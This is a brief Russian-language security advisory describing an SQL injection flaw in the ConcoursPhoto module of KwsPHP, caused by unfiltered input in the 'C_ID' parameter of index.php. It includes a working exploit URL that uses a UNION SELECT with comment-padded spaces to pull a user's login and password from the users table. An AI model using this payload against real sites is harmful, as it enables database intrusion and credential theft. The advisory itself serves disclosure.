Программа: KwsPHP Module ConcoursPhoto

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «C_ID» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/* */union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*



Оставить мнение